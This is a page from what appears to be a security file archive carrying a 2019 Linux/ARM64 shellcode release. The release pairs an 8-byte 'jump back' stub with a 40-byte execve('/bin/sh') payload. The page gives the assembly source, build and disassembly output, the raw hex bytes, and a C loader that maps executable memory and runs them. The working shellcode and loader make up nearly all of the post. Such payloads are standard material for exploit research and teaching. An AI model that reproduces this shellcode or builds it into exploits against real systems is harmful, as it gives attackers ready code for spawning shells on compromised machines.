exploit the possibilities

Linux/ARM64 Jump Back Shellcode + execve("/bin/sh", NULL, NULL) Shellcode

Linux/ARM64 Jump Back Shellcode + execve("/bin/sh", NULL, NULL) Shellcode
Posted Jul 1, 2019
Authored by Ken Kitahara

8 bytes small Linux/ARM64 jump back shellcode + execve("/bin/sh", NULL, NULL) shellcode.

tags | shellcode
systems | linux
MD5 | f672fceee4b282ff0531d21d82df0419

Linux/ARM64 Jump Back Shellcode + execve("/bin/sh", NULL, NULL) Shellcode

Change Mirror Download
/*
# Title: Linux/ARM64 - Jump Back Shellcode + execve("/bin/sh", NULL, NULL) Shellcode (8 Bytes)
# Date: 2019-06-30
# Tested: Ubuntu 16.04 (aarch64)
# Author: Ken Kitahara
# Compilation: gcc -o loader loader.c


ubuntu@ubuntu:~/works$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu Xenial Xerus (development branch)
Release: 16.04
Codename: xenial
ubuntu@ubuntu:~/works$ uname -a
Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
ubuntu@ubuntu:~/works$ cat jumpback.s
.section .text
.global _start
_start:
// Jump back to _start-0x30
adr x10, .-0x30 // x10 = _start-0x30
br x10 // Jump to _start-0x30
ubuntu@ubuntu:~/works$ as -o jumpback.o jumpback.s && ld -o jumpback jumpback.o
ubuntu@ubuntu:~/works$ objdump -d ./jumpback

./jumpback: file format elf64-littleaarch64


Disassembly of section .text:

0000000000400078 <_start>:
400078: 10fffe8a adr x10, 400048 <_start-0x30>
40007c: d61f0140 br x10
ubuntu@ubuntu:~/works$ objcopy -O binary jumpback jumpback.bin
ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' jumpback.bin && echo
\x8a\xfe\xff\x10\x40\x01\x1f\xd6

*/

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>

int (*sc)();

// Linux/ARM64 - execve("/bin/sh", NULL, NULL) Shellcode (40 Bytes)
char shell[] =
"\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2"
"\xe1\x8f\x1f\xf8\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\xe0\x63\x21\x8b"
"\xa8\x1b\x80\xd2\xe1\x66\x02\xd4";

char jumpback[] =
"\x8a\xfe\xff\x10\x40\x01\x1f\xd6";

int main(int argc, char **argv) {
printf("Shellcode Length: %zd Bytes\n", strlen(jumpback));

void *ptr1 = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
void *ptr2;

if (ptr1 == MAP_FAILED) {
perror("mmap");
exit(-1);
}

ptr2 = ptr1 + 0x30;

memcpy(ptr1, shell, sizeof(shell));
memcpy(ptr2, jumpback, sizeof(jumpback));

sc = ptr2;

sc();

return 0;
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close